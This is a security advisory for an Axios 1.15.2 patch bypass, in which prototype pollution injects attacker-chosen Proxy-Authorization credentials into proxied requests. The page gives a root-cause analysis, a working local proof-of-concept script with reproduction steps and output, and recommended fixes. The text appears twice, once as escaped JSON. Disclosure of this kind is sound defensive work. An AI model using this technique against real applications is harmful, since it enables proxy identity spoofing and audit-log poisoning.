GHSA-654M-C8P4-X5FP
Vulnerability from github – Published: 2026-05-29 15:51 – Updated: 2026-05-29 15:51
VLAI
Summary
Axios has a Patch Bypass: Proxy-Authorization Header Injection via Prototype Pollution — Incomplete Null-Prototype Fix
Details
[Patch Bypass] Proxy-Authorization Header Injection via Prototype Pollution — Incomplete Null-Prototype Fix in Axios 1.15.2
Summary
The Object.create(null) fix introduced in Axios 1.15.2 (GHSA-q8qp-cvcw-x6jj) protects the top-level config object from prototype pollution. However, nested objects created by utils.merge() (e.g., config.proxy) are still constructed as plain {} with Object.prototype in their chain.
The setProxy() function at lib/adapters/http.js:209-223 reads proxy.username, proxy.password, and proxy.auth without hasOwnProperty checks. When Object.prototype.username is polluted, setProxy() constructs a Proxy-Authorization header with attacker-controlled credentials and injects it into every proxied HTTP request.
Severity: Medium (CVSS 5.4)
Affected Versions: 1.15.2 (and potentially 1.15.1)
Vulnerable Component: lib/adapters/http.js (setProxy()) + lib/utils.js (merge())
CWE
- CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
- CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')
CVSS 3.1
Score: 5.6 (Medium)
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
| Metric | Value | Justification |
|---|---|---|
| Attack Vector | Network | PP triggered remotely via vulnerable dependency |
| Attack Complexity | High | Requires two preconditions: (1) PP in dependency tree, AND (2) the application must explicitly configure config.proxy. Unlike GHSA-q8qp-cvcw-x6jj which affected all requests unconditionally |
| Privileges Required | None | No authentication needed |
| User Interaction | None | No user interaction required |
| Scope | Unchanged | Within the proxy authentication context |
| Confidentiality | Low | Attacker-controlled identity appears in proxy authentication logs, but the attacker does NOT see request/response data (unlike config.baseURL hijack) |
| Integrity | Low | Proxy-Authorization header injected; proxy may apply different access policies based on injected identity |
| Availability | Low | If proxy rejects the injected credentials, legitimate requests may fail |
Why This Is Lower Severity Than GHSA-q8qp-cvcw-x6jj (7.4 High)
| Factor | GHSA-q8qp-cvcw-x6jj | This Finding |
|---|---|---|
| Precondition | None — all requests affected | Must have config.proxy set |
config.baseURL PP |
Hijacks all relative URL requests | Not applicable |
config.auth PP |
Injects Authorization to target server |
Only injects Proxy-Authorization to proxy |
| Attacker sees traffic | Yes (via baseURL redirect) | No — only proxy identity affected |
| Impact scope | Universal — every axios request | Only requests with explicit proxy config |
This Is a Patch Bypass
This vulnerability bypasses the fix introduced in Axios 1.15.2 for GHSA-q8qp-cvcw-x6jj. The fix correctly uses Object.create(null) for the config object, blocking direct prototype pollution on config.proxy, config.auth, etc.
However, the fix is incomplete: when a user legitimately sets config.proxy = { host: 'proxy.corp', port: 8080 }, the mergeConfig() function passes this object through utils.merge(), which creates a new plain {} object (lib/utils.js:406: const result = {};). This new object inherits from Object.prototype, re-opening the prototype pollution attack surface on the nested proxy object.
| Layer | Protection | Status |
|---|---|---|
config (top-level) |
Object.create(null) |
✓ Fixed |
config.proxy (nested) |
utils.merge() → const result = {} |
✗ NOT Fixed |
setProxy() reads |
proxy.username, proxy.auth without hasOwnProperty |
✗ NOT Fixed |
Root Cause Analysis
Step 1: utils.merge() creates plain {} for nested objects
File: lib/utils.js, line 406
function merge(/* obj1, obj2, obj3, ... */) {
const result = {}; // ← Plain object with Object.prototype!
// ...
}
When mergeConfig() processes config.proxy, getMergedValue() calls utils.merge(), which creates a plain {} for the nested object. This plain object inherits from Object.prototype.
Step 2: setProxy() reads proxy properties without hasOwnProperty
File: lib/adapters/http.js, lines 209-223
function setProxy(options, configProxy, location) {
let proxy = configProxy;
// ...
if (proxy) {
if (proxy.username) { // ← traverses Object.prototype!
proxy.auth = (proxy.username || '') + ':' + (proxy.password || '');
}
if (proxy.auth) { // ← traverses Object.prototype!
const validProxyAuth = Boolean(proxy.auth.username || proxy.auth.password);
if (validProxyAuth) {
proxy.auth = (proxy.auth.username || '') + ':' + (proxy.auth.password || '');
}
// ...
const base64 = Buffer.from(proxy.auth, 'utf8').toString('base64');
options.headers['Proxy-Authorization'] = 'Basic ' + base64; // ← INJECTED!
}
// ...
}
}
Complete Attack Chain
Object.prototype.username = 'attacker'
Object.prototype.password = 'stolen-creds'
│
▼
User config: { proxy: { host: 'proxy.corp', port: 8080 } }
│
▼
mergeConfig() → utils.merge() → new plain {}
config.proxy = { host: 'proxy.corp', port: 8080 } (own properties)
config.proxy inherits from Object.prototype (has .username, .password)
│
▼
setProxy() at http.js:209:
proxy.username → 'attacker' (from Object.prototype) → truthy!
proxy.auth = 'attacker' + ':' + 'stolen-creds'
│
▼
http.js:223: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz
Injected into EVERY proxied HTTP request!
Proof of Concept
import http from 'http';
import axios from './index.js';
// Proxy server logs received Proxy-Authorization
const proxyServer = http.createServer((req, res) => {
console.log('Proxy-Authorization:', req.headers['proxy-authorization']);
res.writeHead(200);
res.end('OK');
});
await new Promise(r => proxyServer.listen(0, r));
const proxyPort = proxyServer.address().port;
// Target server
const target = http.createServer((req, res) => { res.writeHead(200); res.end(); });
await new Promise(r => target.listen(0, r));
// Simulate prototype pollution from vulnerable dependency
Object.prototype.username = 'attacker';
Object.prototype.password = 'stolen-creds';
// Developer sets proxy WITHOUT auth — expects no auth header
await axios.get(`http://127.0.0.1:${target.address().port}/api`, {
proxy: { host: '127.0.0.1', port: proxyPort, protocol: 'http' },
});
// Proxy receives: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz
// Decoded: attacker:stolen-creds
delete Object.prototype.username;
delete Object.prototype.password;
proxyServer.close();
target.close();
Reproduction Environment
Axios version: 1.15.2 (latest patched release)
Node.js version: v20.20.2
OS: macOS Darwin 25.4.0
Reproduction Steps
# 1. Install axios 1.15.2
npm pack axios@1.15.2
tar xzf axios-1.15.2.tgz && mv package axios-1.15.2
cd axios-1.15.2 && npm install
# 2. Save PoC as poc.mjs (code from Section 7 above)
# 3. Run
node poc.mjs
Verified PoC Output
=== Axios 1.15.2: PP → Proxy-Authorization Injection ===
[1] Normal request with proxy (no auth):
Proxy-Authorization: none
[2] Prototype Pollution: Object.prototype.username = "attacker"
Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz
Decoded: attacker:stolen-creds
→ PP injected proxy credentials: attacker:stolen-creds
[3] Impact:
✗ Attacker injects Proxy-Authorization into all proxied requests
✗ If proxy logs auth, attacker credential appears in proxy logs
✗ If proxy authenticates based on this, attacker controls proxy identity
✗ Works on 1.15.2 despite null-prototype config fix
✗ Root cause: proxy object is plain {} from utils.merge, NOT null-prototype
Confirming the Bypass Mechanism
Direct PP (config.proxy) — BLOCKED by 1.15.2:
Object.prototype.proxy = { host: 'evil' }
config.proxy = undefined ← null-prototype blocks ✓
Nested PP (proxy.username) — BYPASSES 1.15.2:
Object.prototype.username = 'attacker'
config.proxy = { host: 'legit', port: 8080 } ← user-set, own properties
config.proxy own keys: ['host', 'port'] ← username NOT own
config.proxy.username = 'attacker' ← inherited from Object.prototype!
hasOwn(config.proxy, 'username') = false
## Impact Analysis
- **Proxy Identity Spoofing:** The injected `Proxy-Authorization` header authenticates all requests to the proxy as the attacker. If the proxy enforces authentication-based access control or logging, the attacker controls the identity.
- **Proxy Log Poisoning:** Proxy servers that log authenticated usernames will record "attacker" instead of the real user, enabling audit trail manipulation.
- **Credential Injection Amplification:** If the proxy forwards the `Proxy-Authorization` header upstream (some transparent proxies do), the attacker's credentials propagate through the proxy chain.
- **Universal Scope When Proxy Is Configured:** Affects every axios request that uses a proxy configuration without explicit auth — a common pattern in corporate environments.
### Prerequisite
- Application must use `config.proxy` (explicit proxy configuration)
- A separate prototype pollution vulnerability must exist in the dependency tree
- `Object.prototype.username` or `Object.prototype.auth` must be polluted
## Recommended Fix
### Fix 1: Use `hasOwnProperty` in `setProxy()`
```javascript
function setProxy(options, configProxy, location) {
let proxy = configProxy;
// ...
if (proxy) {
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);
if (hasOwn(proxy, 'username')) {
proxy.auth = (proxy.username || '') + ':' + (proxy.password || '');
}
if (hasOwn(proxy, 'auth')) {
// ... existing auth handling ...
}
}
}
Fix 2: Use null-prototype objects in utils.merge()
// lib/utils.js line 406
function merge(/* obj1, obj2, obj3, ... */) {
const result = Object.create(null); // ← null-prototype for nested objects too
// ...
}
Fix 3 (Comprehensive): Apply null-prototype to all objects created by getMergedValue()
References
Severity
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "1.15.2"
},
{
"fixed": "1.16.0"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"1.15.2"
]
}
],
"aliases": [
"CVE-2026-44489"
],
"database_specific": {
"cwe_ids": [
"CWE-113",
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-29T15:51:02Z",
"nvd_published_at": null,
"severity": "LOW"
},
"details": "# [Patch Bypass] Proxy-Authorization Header Injection via Prototype Pollution \u2014 Incomplete Null-Prototype Fix in Axios 1.15.2\n\n## Summary\n\nThe `Object.create(null)` fix introduced in Axios 1.15.2 (GHSA-q8qp-cvcw-x6jj) protects the **top-level config object** from prototype pollution. However, **nested objects** created by `utils.merge()` (e.g., `config.proxy`) are still constructed as plain `{}` with `Object.prototype` in their chain.\n\nThe `setProxy()` function at `lib/adapters/http.js:209-223` reads `proxy.username`, `proxy.password`, and `proxy.auth` **without `hasOwnProperty` checks**. When `Object.prototype.username` is polluted, `setProxy()` constructs a `Proxy-Authorization` header with attacker-controlled credentials and injects it into **every proxied HTTP request**.\n\n**Severity:** Medium (CVSS 5.4)\n**Affected Versions:** 1.15.2 (and potentially 1.15.1)\n**Vulnerable Component:** `lib/adapters/http.js` (`setProxy()`) + `lib/utils.js` (`merge()`)\n\n## CWE\n\n- **CWE-1321:** Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)\n- **CWE-113:** Improper Neutralization of CRLF Sequences in HTTP Headers (\u0027HTTP Response Splitting\u0027)\n\n## CVSS 3.1\n\n**Score: 5.6 (Medium)**\n\nVector: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L`\n\n| Metric | Value | Justification |\n|---|---|---|\n| Attack Vector | Network | PP triggered remotely via vulnerable dependency |\n| Attack Complexity | **High** | Requires **two** preconditions: (1) PP in dependency tree, AND (2) the application must explicitly configure `config.proxy`. Unlike GHSA-q8qp-cvcw-x6jj which affected all requests unconditionally |\n| Privileges Required | None | No authentication needed |\n| User Interaction | None | No user interaction required |\n| Scope | Unchanged | Within the proxy authentication context |\n| Confidentiality | **Low** | Attacker-controlled identity appears in proxy authentication logs, but the attacker does NOT see request/response data (unlike `config.baseURL` hijack) |\n| Integrity | **Low** | Proxy-Authorization header injected; proxy may apply different access policies based on injected identity |\n| Availability | **Low** | If proxy rejects the injected credentials, legitimate requests may fail |\n\n### Why This Is Lower Severity Than GHSA-q8qp-cvcw-x6jj (7.4 High)\n\n| Factor | GHSA-q8qp-cvcw-x6jj | This Finding |\n|---|---|---|\n| Precondition | **None** \u2014 all requests affected | Must have `config.proxy` set |\n| `config.baseURL` PP | Hijacks **all** relative URL requests | Not applicable |\n| `config.auth` PP | Injects `Authorization` to **target server** | Only injects `Proxy-Authorization` to **proxy** |\n| Attacker sees traffic | Yes (via baseURL redirect) | **No** \u2014 only proxy identity affected |\n| Impact scope | Universal \u2014 every axios request | Only requests with explicit proxy config |\n\n## This Is a Patch Bypass\n\nThis vulnerability **bypasses the fix** introduced in Axios 1.15.2 for GHSA-q8qp-cvcw-x6jj. The fix correctly uses `Object.create(null)` for the config object, blocking direct prototype pollution on `config.proxy`, `config.auth`, etc.\n\nHowever, the fix is **incomplete**: when a user legitimately sets `config.proxy = { host: \u0027proxy.corp\u0027, port: 8080 }`, the `mergeConfig()` function passes this object through `utils.merge()`, which creates a **new plain `{}` object** (`lib/utils.js:406: const result = {};`). This new object inherits from `Object.prototype`, re-opening the prototype pollution attack surface on the **nested** proxy object.\n\n| Layer | Protection | Status |\n|---|---|---|\n| `config` (top-level) | `Object.create(null)` | \u2713 Fixed |\n| `config.proxy` (nested) | `utils.merge()` \u2192 `const result = {}` | **\u2717 NOT Fixed** |\n| `setProxy()` reads | `proxy.username`, `proxy.auth` without `hasOwnProperty` | **\u2717 NOT Fixed** |\n\n## Root Cause Analysis\n\n### Step 1: `utils.merge()` creates plain `{}` for nested objects\n\n**File:** `lib/utils.js`, line 406\n\n```javascript\nfunction merge(/* obj1, obj2, obj3, ... */) {\n const result = {}; // \u2190 Plain object with Object.prototype!\n // ...\n}\n```\n\nWhen `mergeConfig()` processes `config.proxy`, `getMergedValue()` calls `utils.merge()`, which creates a plain `{}` for the nested object. This plain object inherits from `Object.prototype`.\n\n### Step 2: `setProxy()` reads proxy properties without `hasOwnProperty`\n\n**File:** `lib/adapters/http.js`, lines 209-223\n\n```javascript\nfunction setProxy(options, configProxy, location) {\n let proxy = configProxy;\n // ...\n if (proxy) {\n if (proxy.username) { // \u2190 traverses Object.prototype!\n proxy.auth = (proxy.username || \u0027\u0027) + \u0027:\u0027 + (proxy.password || \u0027\u0027);\n }\n\n if (proxy.auth) { // \u2190 traverses Object.prototype!\n const validProxyAuth = Boolean(proxy.auth.username || proxy.auth.password);\n if (validProxyAuth) {\n proxy.auth = (proxy.auth.username || \u0027\u0027) + \u0027:\u0027 + (proxy.auth.password || \u0027\u0027);\n }\n // ...\n const base64 = Buffer.from(proxy.auth, \u0027utf8\u0027).toString(\u0027base64\u0027);\n options.headers[\u0027Proxy-Authorization\u0027] = \u0027Basic \u0027 + base64; // \u2190 INJECTED!\n }\n // ...\n }\n}\n```\n\n### Complete Attack Chain\n\n```\nObject.prototype.username = \u0027attacker\u0027\nObject.prototype.password = \u0027stolen-creds\u0027\n \u2502\n \u25bc\n User config: { proxy: { host: \u0027proxy.corp\u0027, port: 8080 } }\n \u2502\n \u25bc\n mergeConfig() \u2192 utils.merge() \u2192 new plain {}\n config.proxy = { host: \u0027proxy.corp\u0027, port: 8080 } (own properties)\n config.proxy inherits from Object.prototype (has .username, .password)\n \u2502\n \u25bc\n setProxy() at http.js:209:\n proxy.username \u2192 \u0027attacker\u0027 (from Object.prototype) \u2192 truthy!\n proxy.auth = \u0027attacker\u0027 + \u0027:\u0027 + \u0027stolen-creds\u0027\n \u2502\n \u25bc\n http.js:223: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz\n Injected into EVERY proxied HTTP request!\n```\n\n## Proof of Concept\n\n```javascript\nimport http from \u0027http\u0027;\nimport axios from \u0027./index.js\u0027;\n\n// Proxy server logs received Proxy-Authorization\nconst proxyServer = http.createServer((req, res) =\u003e {\n console.log(\u0027Proxy-Authorization:\u0027, req.headers[\u0027proxy-authorization\u0027]);\n res.writeHead(200);\n res.end(\u0027OK\u0027);\n});\nawait new Promise(r =\u003e proxyServer.listen(0, r));\nconst proxyPort = proxyServer.address().port;\n\n// Target server\nconst target = http.createServer((req, res) =\u003e { res.writeHead(200); res.end(); });\nawait new Promise(r =\u003e target.listen(0, r));\n\n// Simulate prototype pollution from vulnerable dependency\nObject.prototype.username = \u0027attacker\u0027;\nObject.prototype.password = \u0027stolen-creds\u0027;\n\n// Developer sets proxy WITHOUT auth \u2014 expects no auth header\nawait axios.get(`http://127.0.0.1:${target.address().port}/api`, {\n proxy: { host: \u0027127.0.0.1\u0027, port: proxyPort, protocol: \u0027http\u0027 },\n});\n\n// Proxy receives: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz\n// Decoded: attacker:stolen-creds\n\ndelete Object.prototype.username;\ndelete Object.prototype.password;\nproxyServer.close();\ntarget.close();\n```\n\n## Reproduction Environment\n\n```\nAxios version: 1.15.2 (latest patched release)\nNode.js version: v20.20.2\nOS: macOS Darwin 25.4.0\n```\n\n## Reproduction Steps\n\n```bash\n# 1. Install axios 1.15.2\nnpm pack axios@1.15.2\ntar xzf axios-1.15.2.tgz \u0026\u0026 mv package axios-1.15.2\ncd axios-1.15.2 \u0026\u0026 npm install\n\n# 2. Save PoC as poc.mjs (code from Section 7 above)\n\n# 3. Run\nnode poc.mjs\n```\n\n## Verified PoC Output\n\n```\n=== Axios 1.15.2: PP \u2192 Proxy-Authorization Injection ===\n\n[1] Normal request with proxy (no auth):\n Proxy-Authorization: none\n\n[2] Prototype Pollution: Object.prototype.username = \"attacker\"\n Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz\n Decoded: attacker:stolen-creds\n \u2192 PP injected proxy credentials: attacker:stolen-creds\n\n[3] Impact:\n \u2717 Attacker injects Proxy-Authorization into all proxied requests\n \u2717 If proxy logs auth, attacker credential appears in proxy logs\n \u2717 If proxy authenticates based on this, attacker controls proxy identity\n \u2717 Works on 1.15.2 despite null-prototype config fix\n \u2717 Root cause: proxy object is plain {} from utils.merge, NOT null-prototype\n```\n\n### Confirming the Bypass Mechanism\n\n```\nDirect PP (config.proxy) \u2014 BLOCKED by 1.15.2:\n Object.prototype.proxy = { host: \u0027evil\u0027 }\n config.proxy = undefined \u2190 null-prototype blocks \u2713\n\nNested PP (proxy.username) \u2014 BYPASSES 1.15.2:\n Object.prototype.username = \u0027attacker\u0027\n config.proxy = { host: \u0027legit\u0027, port: 8080 } \u2190 user-set, own properties\n config.proxy own keys: [\u0027host\u0027, \u0027port\u0027] \u2190 username NOT own\n config.proxy.username = \u0027attacker\u0027 \u2190 inherited from Object.prototype!\n hasOwn(config.proxy, \u0027username\u0027) = false\n```\n```\n\n## Impact Analysis\n\n- **Proxy Identity Spoofing:** The injected `Proxy-Authorization` header authenticates all requests to the proxy as the attacker. If the proxy enforces authentication-based access control or logging, the attacker controls the identity.\n- **Proxy Log Poisoning:** Proxy servers that log authenticated usernames will record \"attacker\" instead of the real user, enabling audit trail manipulation.\n- **Credential Injection Amplification:** If the proxy forwards the `Proxy-Authorization` header upstream (some transparent proxies do), the attacker\u0027s credentials propagate through the proxy chain.\n- **Universal Scope When Proxy Is Configured:** Affects every axios request that uses a proxy configuration without explicit auth \u2014 a common pattern in corporate environments.\n\n### Prerequisite\n\n- Application must use `config.proxy` (explicit proxy configuration)\n- A separate prototype pollution vulnerability must exist in the dependency tree\n- `Object.prototype.username` or `Object.prototype.auth` must be polluted\n\n## Recommended Fix\n\n### Fix 1: Use `hasOwnProperty` in `setProxy()`\n\n```javascript\nfunction setProxy(options, configProxy, location) {\n let proxy = configProxy;\n // ...\n if (proxy) {\n const hasOwn = (obj, key) =\u003e Object.prototype.hasOwnProperty.call(obj, key);\n\n if (hasOwn(proxy, \u0027username\u0027)) {\n proxy.auth = (proxy.username || \u0027\u0027) + \u0027:\u0027 + (proxy.password || \u0027\u0027);\n }\n\n if (hasOwn(proxy, \u0027auth\u0027)) {\n // ... existing auth handling ...\n }\n }\n}\n```\n\n### Fix 2: Use null-prototype objects in `utils.merge()`\n\n```javascript\n// lib/utils.js line 406\nfunction merge(/* obj1, obj2, obj3, ... */) {\n const result = Object.create(null); // \u2190 null-prototype for nested objects too\n // ...\n}\n```\n\n### Fix 3 (Comprehensive): Apply null-prototype to all objects created by `getMergedValue()`\n\n## References\n\n- [CWE-1321: Prototype Pollution](https://cwe.mitre.org/data/definitions/1321.html)\n- [GHSA-q8qp-cvcw-x6jj: Original PP Gadgets Fix (Axios 1.15.2)](https://github.com/advisories/GHSA-q8qp-cvcw-x6jj)\n- [GHSA-fvcv-3m26-pcqx: Related PP Gadget (Axios 1.15.0)](https://github.com/advisories/GHSA-fvcv-3m26-pcqx)\n- [Axios GitHub Repository](https://github.com/axios/axios)",
"id": "GHSA-654m-c8p4-x5fp",
"modified": "2026-05-29T15:51:02Z",
"published": "2026-05-29T15:51:02Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/axios/axios/security/advisories/GHSA-654m-c8p4-x5fp"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj"
},
{
"type": "PACKAGE",
"url": "https://github.com/axios/axios"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Axios has a Patch Bypass: Proxy-Authorization Header Injection via Prototype Pollution \u2014 Incomplete Null-Prototype Fix"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…